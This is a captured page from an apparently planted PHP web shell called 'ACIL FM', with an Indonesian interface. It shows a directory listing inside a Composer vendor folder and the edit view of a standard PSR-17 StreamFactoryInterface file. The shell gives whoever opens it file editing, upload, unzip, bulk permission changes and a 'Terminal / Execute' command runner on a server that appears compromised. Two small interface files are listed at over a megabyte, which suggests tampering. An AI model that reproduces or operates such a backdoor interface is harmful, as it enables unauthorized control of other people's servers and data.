ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test/vendor/psr/http-factory/src
/
home
mhhtmff
app
NH-HR-test
vendor
psr
http-factory
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
RequestFactoryInterface.php
499 B
chmod
View
DL
Edit
Rename
Delete
ResponseFactoryInterface.php
546 B
chmod
View
DL
Edit
Rename
Delete
ServerRequestFactoryInterface.php
927 B
chmod
View
DL
Edit
Rename
Delete
StreamFactoryInterface.php
1.38 MB
chmod
View
DL
Edit
Rename
Delete
UploadedFileFactoryInterface.php
1.1 MB
chmod
View
DL
Edit
Rename
Delete
UriFactoryInterface.php
325 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test/vendor/psr/http-factory/src/StreamFactoryInterface.php
<?php namespace Psr\Http\Message; interface StreamFactoryInterface { /** * Create a new stream from a string. * * The stream SHOULD be created with a temporary resource. * * @param string $content String content with which to populate the stream. * * @return StreamInterface */ public function createStream(string $content = ''): StreamInterface; /** * Create a stream from an existing file. * * The file MUST be opened using the given mode, which may be any mode * supported by the `fopen` function. * * The `$filename` MAY be any string supported by `fopen()`. * * @param string $filename Filename or stream URI to use as basis of stream. * @param string $mode Mode with which to open the underlying filename/stream. * * @return StreamInterface * @throws \RuntimeException If the file cannot be opened. * @throws \InvalidArgumentException If the mode is invalid. */ public function createStreamFromFile(string $filename, string $mode = 'r'): StreamInterface; /** * Create a new stream from an existing resource. * * The stream MUST be readable and may be writable. * * @param resource $resource PHP resource to use as basis of stream. * * @return StreamInterface */ public function createStreamFromResource($resource): StreamInterface; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply